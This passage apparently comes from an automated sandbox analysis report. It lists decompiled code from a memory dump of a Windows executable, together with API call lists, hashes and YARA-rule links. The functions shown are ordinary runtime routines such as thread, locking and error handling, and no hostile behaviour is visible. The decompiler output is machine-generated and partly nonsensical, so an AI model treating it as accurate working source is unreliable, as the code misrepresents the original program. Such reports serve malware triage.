					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
					_t147 = _t76;
					if(_t76 == 0) {
						goto L12;
					} else {
						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
						_v588 = 5;
						E0040858C( &_v600, 0x105,  &_v558);
						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
						_v584 = _v596;
						_v580 = 0x11;
						_v576 = _v8;
						_v572 = 0x11;
						_v568 = _t115;
						_v564 = 5;
						_push( &_v592);
						_t103 =  *0x4ba6e0; // 0x40e810
						E0040C9F0(_t103,  &_v604, _t140, 3);
						E0041F2A0(_t115, _v604, 1, _t136, _t138);
					}
				} else {
					L12:
					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
					_v624 = 5;
					_v620 = _v8;
					_v616 = 0x11;
					_v612 = _t115;
					_v608 = 5;
					_push( &_v628);
					_t82 =  *0x4ba67c; // 0x40e6d8
					E0040C9F0(_t82,  &_v632, _t140, 2);
					E0041F2A0(_t115, _v632, 1, _t136, _t138);
				}
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(0x41f9ad);
				E00407A20( &_v632);
				E00407A80( &_v604, 3);
				return E00407A20( &_v8);
			}






































                                                                    0x0041f7a0
                                                                    0x0041f7a1
                                                                    0x0041f7ad
                                                                    0x0041f7b3
                                                                    0x0041f7b9
                                                                    0x0041f7bf
                                                                    0x0041f7c5
                                                                    0x0041f7ca
                                                                    0x0041f7cb
                                                                    0x0041f7d0
                                                                    0x0041f7d3
                                                                    0x0041f7df
                                                                    0x0041f7df
                                                                    0x0041f7e2
                                                                    0x0041f7f0
                                                                    0x0041f7f5
                                                                    0x0041f7e4
                                                                    0x0041f7e4
                                                                    0x0041f7ff
                                                                    0x0041f804
                                                                    0x0041f7e6
                                                                    0x0041f7e9
                                                                    0x0041f80e
                                                                    0x0041f813
                                                                    0x0041f7eb
                                                                    0x0041f81d
                                                                    0x0041f822
                                                                    0x0041f822
                                                                    0x0041f7e9
                                                                    0x0041f7e4
                                                                    0x0041f82d
                                                                    0x0041f840
                                                                    0x0041f845
                                                                    0x0041f84e
                                                                    0x0041f86c
                                                                    0x0041f871
                                                                    0x0041f873
                                                                    0x00000000
                                                                    0x0041f879
                                                                    0x0041f882
                                                                    0x0041f888
                                                                    0x0041f8a0
                                                                    0x0041f8b1
                                                                    0x0041f8bc
                                                                    0x0041f8c2
                                                                    0x0041f8cc
                                                                    0x0041f8d2
                                                                    0x0041f8d9
                                                                    0x0041f8df
                                                                    0x0041f8ec
                                                                    0x0041f8f5
                                                                    0x0041f8fa
                                                                    0x0041f90c
                                                                    0x0041f911
                                                                    0x0041f915
                                                                    0x0041f915
                                                                    0x0041f91e
                                                                    0x0041f924
                                                                    0x0041f92e
                                                                    0x0041f934
                                                                    0x0041f93b
                                                                    0x0041f941
                                                                    0x0041f94e
                                                                    0x0041f957
                                                                    0x0041f95c
                                                                    0x0041f96e
                                                                    0x0041f973
                                                                    0x0041f977
                                                                    0x0041f97a
                                                                    0x0041f97d
                                                                    0x0041f988
                                                                    0x0041f998
                                                                    0x0041f9a5

                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C
                                                                      • Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileLoadModuleNameQueryStringVirtual
                                                                    • String ID: 0@$8@$@@$H@
                                                                    • API String ID: 902310565-4161625419
                                                                    • Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                    • Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
                                                                    • Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                    • Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406688, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E00406688(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E00406B30(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040688C(_t71);
								_t57 =  *0x4bb8f8; // 0x4b9284
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E00406368( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}











                                                                    0x0040668f
                                                                    0x00406691
                                                                    0x00406693
                                                                    0x00406696
                                                                    0x00406696
                                                                    0x0040669d
                                                                    0x004066a4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004066b2
                                                                    0x004066b9
                                                                    0x00406751
                                                                    0x00406751
                                                                    0x00406751
                                                                    0x00406755
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406760
                                                                    0x00406766
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406768
                                                                    0x00406768
                                                                    0x0040676d
                                                                    0x00406773
                                                                    0x0040677a
                                                                    0x00406784
                                                                    0x00406789
                                                                    0x00406790
                                                                    0x00406797
                                                                    0x004067a5
                                                                    0x004067b3
                                                                    0x004067a7
                                                                    0x004067af
                                                                    0x004067af
                                                                    0x004067a5
                                                                    0x004067b9
                                                                    0x004067db
                                                                    0x004067e4
                                                                    0x004067e8
                                                                    0x004067ec
                                                                    0x00000000
                                                                    0x004067bb
                                                                    0x004067bb
                                                                    0x004067c0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004067cc
                                                                    0x004067d2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004067d4
                                                                    0x00000000
                                                                    0x004067d4
                                                                    0x004067bb
                                                                    0x004067f1
                                                                    0x004067f1
                                                                    0x00406800
                                                                    0x00406807
                                                                    0x0040680a
                                                                    0x0040680a
                                                                    0x00000000
                                                                    0x00406800
                                                                    0x00000000
                                                                    0x00406751
                                                                    0x004066c4
                                                                    0x004066ca
                                                                    0x004066d0
                                                                    0x0040672c
                                                                    0x0040672f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406736
                                                                    0x0040673e
                                                                    0x00406744
                                                                    0x0040674f
                                                                    0x00000000
                                                                    0x0040674f
                                                                    0x00406746
                                                                    0x00000000
                                                                    0x00406746
                                                                    0x00000000
                                                                    0x004066d2
                                                                    0x004066d5
                                                                    0x00000000
                                                                    0x004066e4
                                                                    0x004066e4
                                                                    0x004066e4
                                                                    0x00000000
                                                                    0x004066ed
                                                                    0x004066f0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004066f5
                                                                    0x0040671e
                                                                    0x00406722
                                                                    0x00406727
                                                                    0x0040672a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040672a
                                                                    0x004066fe
                                                                    0x00406704
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040670b
                                                                    0x0040670e
                                                                    0x00406715
                                                                    0x00000000
                                                                    0x00406715
                                                                    0x00406811
                                                                    0x0040681c

                                                                    APIs
                                                                      • Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33
                                                                    • GetTickCount.KERNEL32 ref: 004066BF
                                                                    • GetTickCount.KERNEL32 ref: 004066D7
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00406706
                                                                    • GetTickCount.KERNEL32 ref: 00406731
                                                                    • GetTickCount.KERNEL32 ref: 00406768
                                                                    • GetTickCount.KERNEL32 ref: 00406792
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00406802
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CountTick$CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 3968769311-0
                                                                    • Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                    • Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
                                                                    • Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                    • Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004971AC, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 80%
                                                                    			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* _t23;
				char _t29;
				void* _t50;
				intOrPtr _t55;
				char _t57;
				intOrPtr _t59;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t64 = __edi;
				_t57 = __edx;
				_t50 = __ecx;
				_t68 = _t69;
				_t70 = _t69 + 0xfffffff0;
				_v20 = 0;
				if(__edx != 0) {
					_t70 = _t70 + 0xfffffff0;
					_t23 = E004062B0(_t23, _t68);
				}
				_t49 = _t50;
				_v5 = _t57;
				_t66 = _t23;
				_push(_t68);
				_push(0x4972a5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				E00405CB8(0);
				_t3 = _t66 + 0x2c; // 0x266461
				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				 *((char*)(_t66 + 0xd)) = _t29;
				if( *(_t66 + 0x2c) != 0) {
					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
				} else {
					if(_a4 == 0) {
						_t12 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
					} else {
						_t9 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
					}
					if( *((intOrPtr*)(_t66 + 8)) == 0) {
						E0041DFB0(GetLastError(), _t49, 0, _t66);
						_v16 = _v20;
						_v12 = 0x11;
						_t55 =  *0x4ba740; // 0x40ea6c
						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
						E0040711C();
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x4972ac);
				return E00407A20( &_v20);
			}


















                                                                    0x004971ac
                                                                    0x004971ac
                                                                    0x004971ac
                                                                    0x004971ad
                                                                    0x004971af
                                                                    0x004971b6
                                                                    0x004971bb
                                                                    0x004971bd
                                                                    0x004971c0
                                                                    0x004971c0
                                                                    0x004971c5
                                                                    0x004971c7
                                                                    0x004971ca
                                                                    0x004971ce
                                                                    0x004971cf
                                                                    0x004971d4
                                                                    0x004971d7
                                                                    0x004971de
                                                                    0x004971e3
                                                                    0x004971e9
                                                                    0x004971ee
                                                                    0x004971f6
                                                                    0x004971fa
                                                                    0x004971fa
                                                                    0x004971fa
                                                                    0x004971fc
                                                                    0x00497203
                                                                    0x00497284
                                                                    0x0049728c
                                                                    0x00497205
                                                                    0x00497209
                                                                    0x0049722c
                                                                    0x0049723e
                                                                    0x0049720b
                                                                    0x00497211
                                                                    0x00497224
                                                                    0x00497224
                                                                    0x00497245
                                                                    0x00497251
                                                                    0x00497259
                                                                    0x0049725c
                                                                    0x00497266
                                                                    0x00497273
                                                                    0x00497278
                                                                    0x00497278
                                                                    0x00497245
                                                                    0x00497291
                                                                    0x00497294
                                                                    0x00497297
                                                                    0x004972a4

                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247
                                                                      • Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A
                                                                    • GetCurrentThread.KERNEL32 ref: 0049727F
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00497287
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Thread$Current$CreateErrorLast
                                                                    • String ID: 0@G$XtI$l@
                                                                    • API String ID: 3539746228-385768319
                                                                    • Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                    • Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
                                                                    • Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                    • Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406424, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 36%
                                                                    			E00406424(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00403808();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E004053F0(_v16);
						_push(_t41);
						_push(E004064D2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00403808();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E004064D9);
							return E0040540C(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E00407210();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}












                                                                    0x00406425
                                                                    0x00406427
                                                                    0x0040642c
                                                                    0x00406446
                                                                    0x004064d9
                                                                    0x004064d9
                                                                    0x00000000
                                                                    0x0040644c
                                                                    0x0040644c
                                                                    0x0040644f
                                                                    0x00406450
                                                                    0x00406452
                                                                    0x00406459
                                                                    0x00000000
                                                                    0x00406465
                                                                    0x0040646d
                                                                    0x00406472
                                                                    0x00406473
                                                                    0x00406478
                                                                    0x0040647b
                                                                    0x00406481
                                                                    0x00406485
                                                                    0x00406486
                                                                    0x0040648b
                                                                    0x00406492
                                                                    0x004064bc
                                                                    0x004064be
                                                                    0x004064c1
                                                                    0x004064c4
                                                                    0x004064d1
                                                                    0x00406494
                                                                    0x00406494
                                                                    0x004064af
                                                                    0x004064b2
                                                                    0x004064ba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004064ba
                                                                    0x004064a5
                                                                    0x004064a8
                                                                    0x004064e0
                                                                    0x004064e6
                                                                    0x004064e6
                                                                    0x00406492
                                                                    0x00406459
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
                                                                    • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressErrorHandleLastModuleProc
                                                                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                    • API String ID: 4275029093-79381301
                                                                    • Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                    • Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
                                                                    • Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                    • Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004076B8, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 43%
                                                                    			E004076B8(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x4bb058 == 0) {
					if( *0x4b7032 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L00403780();
					}
					return _t3;
				} else {
					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
						 *0x4bb35c();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E00408240(0x40774c);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}






                                                                    0x004076c0
                                                                    0x00407726
                                                                    0x00407728
                                                                    0x0040772a
                                                                    0x0040772f
                                                                    0x00407734
                                                                    0x00407736
                                                                    0x00407736
                                                                    0x0040773c
                                                                    0x004076c2
                                                                    0x004076cb
                                                                    0x004076db
                                                                    0x004076db
                                                                    0x004076f7
                                                                    0x0040770a
                                                                    0x0040771e
                                                                    0x0040771e

                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID: Error$Runtime error at 00000000
                                                                    • API String ID: 3320372497-2970929446
                                                                    • Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                    • Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
                                                                    • Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                    • Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00420524, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00420524(void* __ebx, void* __esi) {
				intOrPtr _t4;
				intOrPtr _t6;

				if(E0041FF68(6, 0) == 0) {
					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
					 *0x4be914 = _t4;
					 *0x4be910 = E00420428;
					return _t4;
				} else {
					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
					 *0x4be910 = _t6;
					return _t6;
				}
			}





                                                                    0x00420532
                                                                    0x0042055f
                                                                    0x00420564
                                                                    0x00420569
                                                                    0x00420573
                                                                    0x00420534
                                                                    0x00420544
                                                                    0x00420549
                                                                    0x0042054e
                                                                    0x0042054e

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E
                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                    • GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc
                                                                    • String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
                                                                    • API String ID: 1883125708-3870080525
                                                                    • Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                    • Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
                                                                    • Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                    • Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042931C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					E00428FDC(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L00427254();
					return E00428FDC(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L00427828();
						_t123 = _t64;
						if(_t123 == 0) {
							E00428D34(_t110);
						}
						E00429278(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00429294(_v788 - 1, _t125) != 0) {
								L00427840();
								E00428FDC(_v792);
								L00427840();
								E00428FDC( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004292C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L00427830();
							E00428FDC(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L00427838();
